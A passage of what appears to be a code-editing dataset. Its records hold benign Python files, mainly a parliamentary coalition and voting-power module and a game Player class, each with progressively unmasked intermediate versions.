tw\r\n\r\nif __name__ == '__main__':\r\n\tcash = 10000 # arbitrary amount\r\n\r\n\r\n\tuniverse = ['FB'] # need to change the universe\r\n\tdata = load_from_yahoo(stocks=universe,\r\n\t\tindexes={}, start=datetime(2016, 4, 3), \r\n\t\tend=datetime.today()) \r\n\t\r\n\r\n\r\n\tolmar = TradingAlgorithm(initialize=initialize, handle_data=handle_data, capital_base=10000) \r\n\tbacktest = olmar.run(data)\r\n\tbacktest.to_csv('backtest-50-2012.csv') \r\n\tprint backtest['algorithm_period_return'][-1]\r\n\r\n\timport pyfolio as pf\r\n\treturns, positions, transactions, gross_lev = pf.utils.extract_rets_pos_txn_from_zipline(backtest)\r\n\tpf.create_full_tear_sheet(returns, positions=positions, transactions=transactions, gross_lev=gross_lev, live_start_date='2004-10-22')\r\n\t",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import collections
import itertools
from . import stats
__all__ = [
'Party',
'HoR',
'Coalition'
]
Party = collections.namedtuple('Party', 'name,votes,seats')
class HoR(object):
"""House of Representatives"""
def __init__(self, parties, name='HoR'):
self.name = name
self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.votes), reverse=True))
self._party_mapping = {p.name: p for p in self._parties}
def __getitem__(self, item):
return self._party_mapping[item]
@property
def parties(self):
return self._parties
def seats_list(self):
return [p.seats for p in self._parties]
def votes_list(self):
return [p.votes for p in self._parties]
def names_list(self):
return [p.name for p in self._parties]
def vote_shares_list(self):
v = self.votes
return [vi / v for vi in self.votes_list()]
def seat_shares_list(self):
s = self.seats
return [si / s for si in self.seats_list()]
@property
def seats(self):
return sum(self.seats_list())
@property
def votes(self):
return sum(self.votes_list())
def top(self, n=1):
return Coalition(self, self._parties[:n])
def as_coalition(self):
return Coalition(self, self._parties)
def __contains__(self, item):
return item in self._parties
def __iter__(self):
return iter(self._parties)
def iter_coalitions(self):
for n in range(1, len(self)):
for coalition in itertools.combinations(self._parties, n):
yield Coalition(self, coalition)
def __len__(self):
return len(self._parties)
def __hash__(self):
return hash(self._parties)
def same_as(self, hor):
return self.parties == hor.parties
def __eq__(self, other):
return self.seats == other.seats
def __gt__(self, other):
return self.seats > other.seats
def __ge__(self, other):
return self.seats >= other.seats
def __le__(self, other):
return self.seats <= other.seats
def __lt__(self, other):
return self.seats < other.seats
haar = stats.haar
dev = stats.dev
ens = stats.ens
env = stats.env
rrp = stats.rrp
bantsaf_influence = stats.bantsaf_influence
shepli_shubic = stats.shepli_shubic
jonson_general = stats.jonson_general
jonson_influence = stats.jonson_influence
digen_pakel_general = stats.digen_pakel_general
digen_pakel_influence = stats.digen_pakel_influence
holer_pakel = stats.holer_pakel
describe = stats.describe
def map_stat(self, stat):
if stat in ('seats', 'votes'):
return {party.name: getattr(party, stat)
for party in self._parties}
elif stat in (
stats.bantsaf_influence,
stats.shepli_shubic,
stats.jonson_general,
stats.jonson_influence,
stats.digen_pakel_general,
stats.digen_pakel_influence,
stats.holer_pakel,
):
return {party.name: stat(self, party)
for party in self._parties}
elif stat not in (
'bantsaf_influence',
'shepli_shubic',
'jonson_general',
'jonson_influence',
'digen_pakel_general',
'digen_pakel_influence',
'holer_pakel',
):
raise ValueError('Stat {} cannot be computed'.format(stat))
return {party.name: getattr(self, stat)(party)
for party in self._parties}
class Coalition(HoR):
def __init__(self, hor, parties, name='Coalition', *, _opposition=None):
super().__init__(parties, name=name)
self._hor = hor
self._opposition = _opposition
@property
def opposition(self):
if self._opposition is None:
others = [p for p in self._hor if p not in self]
self._opposition = Coalition(self._hor, others, _opposition=self)
return self._opposition
@property
def hor(self):
return self._hor
def __add__(self, other):
if isinstance(other, Party):
if other in self:
raise ValueError('{} is already present in HoR'.format(other))
new = self._parties + (other, )
elif isinstance(other, Coalition) and other.hor.same_as(self.hor):
intercept = set(other) & set(self._parties)
if intercept:
raise ValueError('{} are already present in HoR'.format(intercept))
new = self._parties + tuple(other)
else:
raise TypeError('Wrong type for {}'.format(other))
return self.__class__(self.hor, new)
def __sub__(self, other):
if isinstance(other, Party):
if other not in self:
raise ValueError('{} is not present in HoR'.format(other))
new = set(self._parties) - {other}
elif isinstance(other, Coalition) and other.hor.same_as(self.hor):
intercept = set(other) & set(self._parties)
if not intercept:
raise ValueError('{} are not present in HoR'.format(intercept))
new = set(self._parties) - set(other.parties)
else:
raise TypeError('Wrong type for {}'.format(other))
return self.__class__(self.hor, new)
def has_key_party(self, party):
if party not in self:
return False
else:
opposition = self.opposition
return (
(self > opposition)
and
((self - party) <= (opposition + party))
)
def key_parties(self):
return list(filter(self.has_key_party, self.parties))
def is_minimum_winning(self):
return all(map(self.has_key_party, self.parties))
|
normal
|
{
"blob_id": "4c927f14065d0557dbe7b371002e133c351d3478",
"index": 6933,
"step-1": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n <mask token>\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n <mask token>\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n",
"step-2": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n <mask token>\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n",
"step-3": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat) for party in self._parties\n }\n elif stat in (stats.bantsaf_influence, stats.shepli_shubic, stats.\n jonson_general, stats.jonson_influence, stats.\n digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel\n ):\n return {party.name: stat(self, party) for party in self._parties}\n elif stat not in ('bantsaf_influence', 'shepli_shubic',\n 'jonson_general', 'jonson_influence', 'digen_pakel_general',\n 'digen_pakel_influence', 'holer_pakel'):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party) for party in self.\n _parties}\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n",
"step-4": "<mask token>\n\n\nclass HoR(object):\n \"\"\"House of Representatives\"\"\"\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n haar = stats.haar\n dev = stats.dev\n ens = stats.ens\n env = stats.env\n rrp = stats.rrp\n bantsaf_influence = stats.bantsaf_influence\n shepli_shubic = stats.shepli_shubic\n jonson_general = stats.jonson_general\n jonson_influence = stats.jonson_influence\n digen_pakel_general = stats.digen_pakel_general\n digen_pakel_influence = stats.digen_pakel_influence\n holer_pakel = stats.holer_pakel\n describe = stats.describe\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat) for party in self._parties\n }\n elif stat in (stats.bantsaf_influence, stats.shepli_shubic, stats.\n jonson_general, stats.jonson_influence, stats.\n digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel\n ):\n return {party.name: stat(self, party) for party in self._parties}\n elif stat not in ('bantsaf_influence', 'shepli_shubic',\n 'jonson_general', 'jonson_influence', 'digen_pakel_general',\n 'digen_pakel_influence', 'holer_pakel'):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party) for party in self.\n _parties}\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n",
"step-5": "import collections\nimport itertools\nfrom . import stats\n\n__all__ = [\n 'Party',\n 'HoR',\n 'Coalition'\n]\n\nParty = collections.namedtuple('Party', 'name,votes,seats')\n\n\nclass HoR(object):\n \"\"\"House of Representatives\"\"\"\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [vi / v for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [si / s for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n\n haar = stats.haar\n dev = stats.dev\n ens = stats.ens\n env = stats.env\n rrp = stats.rrp\n bantsaf_influence = stats.bantsaf_influence\n shepli_shubic = stats.shepli_shubic\n jonson_general = stats.jonson_general\n jonson_influence = stats.jonson_influence\n digen_pakel_general = stats.digen_pakel_general\n digen_pakel_influence = stats.digen_pakel_influence\n holer_pakel = stats.holer_pakel\n describe = stats.describe\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat)\n for party in self._parties}\n elif stat in (\n stats.bantsaf_influence,\n stats.shepli_shubic,\n stats.jonson_general,\n stats.jonson_influence,\n stats.digen_pakel_general,\n stats.digen_pakel_influence,\n stats.holer_pakel,\n ):\n return {party.name: stat(self, party)\n for party in self._parties}\n elif stat not in (\n 'bantsaf_influence',\n 'shepli_shubic',\n 'jonson_general',\n 'jonson_influence',\n 'digen_pakel_general',\n 'digen_pakel_influence',\n 'holer_pakel',\n ):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party)\n for party in self._parties}\n\n\nclass Coalition(HoR):\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other, )\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return (\n (self > opposition)\n and\n ((self - party) <= (opposition + party))\n )\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n\n",
"step-ids": [
31,
32,
34,
36,
39
]
}
|
[
31,
32,
34,
36,
39
] |
from random import randint
from Ball import Ball
from Util import Vector, Rectangle
class Player:
RADIUS = 10
COLOR1 = "#80d6ff"
COLOR2 = "#ff867c"
OUTLINE = "#000000"
@property
def right(self):
return self.pos.sub(Vector(Player.RADIUS, 0))
@property
def left(self):
return self.pos.add(Vector(Player.RADIUS, 0))
@property
def color(self):
if self.team == 1:
return Player.COLOR1
elif self.team == 2:
return Player.COLOR2
def __init__(self, canvas, team):
self.canvas = canvas
self.team = team
self.pos = Vector(0, 0)
self.old_pos = Vector(0, 0)
self.shape = None
def set(self, v):
self.old_pos = self.pos
self.pos = v
self.paint()
def move(self, v: Vector):
self.set(self.pos.add(v))
def move_to_point(self, point: Vector):
v = randint(1, 10) / 10
self.move(point.sub(self.pos).norm().mul(Vector(v, v)))
def get_ball(self, ball):
if self.team == 1:
ball.set(self.right)
elif self.team == 2:
ball.set(self.left)
def paint(self):
if self.shape is None:
self.shape = self.canvas.create_rectangle(-Player.RADIUS, -Player.RADIUS, Player.RADIUS, Player.RADIUS,
outline=Player.OUTLINE, fill=self.color)
delta = self.pos.sub(self.old_pos)
self.canvas.move(self.shape, delta.x, delta.y)
def rectangle(self) -> Rectangle:
return self.pos.rect(Player.RADIUS)
def ball_hit_test(self, ball: Ball) -> bool:
return self.rectangle().hit(ball.pos)
|
normal
|
{
"blob_id": "04b02931b749ad06a512b78ca5661ae1f5cb8a9c",
"index": 5534,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Player:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def right(self):\n return self.pos.sub(Vector(Player.RADIUS, 0))\n\n @property\n def left(self):\n return self.pos.add(Vector(Player.RADIUS, 0))\n <mask token>\n <mask token>\n\n def set(self, v):\n self.old_pos = self.pos\n self.pos = v\n self.paint()\n\n def move(self, v: Vector):\n self.set(self.pos.add(v))\n <mask token>\n\n def get_ball(self, ball):\n if self.team == 1:\n ball.set(self.right)\n elif self.team == 2:\n ball.set(self.left)\n\n def paint(self):\n if self.shape is None:\n self.shape = self.canvas.create_rectangle(-Player.RADIUS, -\n Player.RADIUS, Player.RADIUS, Player.RADIUS, outline=Player\n .OUTLINE, fill=self.color)\n delta = self.pos.sub(self.old_pos)\n self.canvas.move(self.shape, delta.x, delta.y)\n <mask token>\n\n def ball_hit_test(self, ball: Ball) ->bool:\n return self.rectangle().hit(ball.pos)\n",
"step-3": "<mask token>\n\n\nclass Player:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def right(self):\n return self.pos.sub(Vector(Player.RADIUS, 0))\n\n @property\n def left(self):\n return self.pos.add(Vector(Player.RADIUS, 0))\n <mask token>\n <mask token>\n\n def set(self, v):\n self.old_pos = self.pos\n self.pos = v\n self.paint()\n\n def move(self, v: Vector):\n self.set(self.pos.add(v))\n\n def move_to_point(self, point: Vector):\n v = randint(1, 10) / 10\n self.move(point.sub(self.pos).norm().mul(Vector(v, v)))\n\n def get_ball(self, ball):\n if self.team == 1:\n ball.set(self.right)\n elif self.team == 2:\n ball.set(self.left)\n\n def paint(self):\n if self.shape is None:\n self.shape = self.canvas.create_rectangle(-Player.RADIUS, -\n Player.RADIUS, Player.RADIUS, Player.RADIUS, outline=Player\n .OUTLINE, fill=self.color)\n delta = self.pos.sub(self.old_pos)\n self.canvas.move(self.shape, delta.x, delta.y)\n <mask token>\n\n def ball_hit_test(self, ball: Ball) ->bool:\n return self.rectangle().hit(ball.pos)\n",
"step-4": "from random import randint\nfrom Ball import Ball\nfrom Util import Vector, Rectangle\n\n\nclass Player:\n RADIUS = 10\n COLOR1 = '#80d6ff'\n COLOR2 = '#ff867c'\n OUTLINE = '#000000'\n\n @property\n def right(self):\n return self.pos.sub(Vector(Player.RADIUS, 0))\n\n @property\n def left(self):\n return self.pos.add(Vector(Player.RADIUS, 0))\n\n @property\n def color(self):\n if self.team == 1:\n return Player.COLOR1\n elif self.team == 2:\n return Player.COLOR2\n\n def __init__(self, canvas, team):\n self.canvas = canvas\n self.team = team\n self.pos = Vector(0, 0)\n self.old_pos = Vector(0, 0)\n self.shape = None\n\n def set(self, v):\n self.old_pos = self.pos\n self.pos = v\n self.paint()\n\n def move(self, v: Vector):\n self.set(self.pos.add(v))\n\n def move_to_point(self, point: Vector):\n v = randint(1, 10) / 10\n self.move(point.sub(self.pos).norm().mul(Vector(v, v)))\n\n def get_ball(self, ball):\n if self.team == 1:\n ball.set(self.right)\n elif self.team == 2:\n ball.set(self.left)\n\n def paint(self):\n if self.shape is None:\n self.shape = self.canvas.create_rectangle(-Player.RADIUS, -\n Player.RADIUS, Player.RADIUS, Player.RADIUS, outline=Player\n .OUTLINE, fill=self.color)\n delta = self.pos.sub(self.old_pos)\n self.canvas.move(self.shape, delta.x, delta.y)\n\n def rectangle(self) ->Rectangle:\n return self.pos.rect(Player.RADIUS)\n\n def ball_hit_test(self, ball: Ball) ->bool:\n return self.rectangle().hit(ball.pos)\n",
"step-5": "from random import randint\n\nfrom Ball import Ball\nfrom Util import Vector, Rectangle\n\n\nclass Player:\n RADIUS = 10\n\n COLOR1 = \"#80d6ff\"\n COLOR2 = \"#ff867c\"\n OUTLINE = \"#000000\"\n\n @property\n def right(self):\n return self.pos.sub(Vector(Player.RADIUS, 0))\n\n @property\n def left(self):\n return self.pos.add(Vector(Player.RADIUS, 0))\n\n @property\n def color(self):\n if self.team == 1:\n return Player.COLOR1\n elif self.team == 2:\n return Player.COLOR2\n\n def __init__(self, canvas, team):\n self.canvas = canvas\n self.team = team\n self.pos = Vector(0, 0)\n self.old_pos = Vector(0, 0)\n self.shape = None\n\n def set(self, v):\n self.old_pos = self.pos\n self.pos = v\n self.paint()\n\n def move(self, v: Vector):\n self.set(self.pos.add(v))\n\n def move_to_point(self, point: Vector):\n v = randint(1, 10) / 10\n self.move(point.sub(self.pos).norm().mul(Vector(v, v)))\n\n def get_ball(self, ball):\n if self.team == 1:\n ball.set(self.right)\n elif self.team == 2:\n ball.set(self.left)\n\n def paint(self):\n if self.shape is None:\n self.shape = self.canvas.create_rectangle(-Player.RADIUS, -Player.RADIUS, Player.RADIUS, Player.RADIUS,\n outline=Player.OUTLINE, fill=self.color)\n delta = self.pos.sub(self.old_pos)\n self.canvas.move(self.shape, delta.x, delta.y)\n\n def rectangle(self) -> 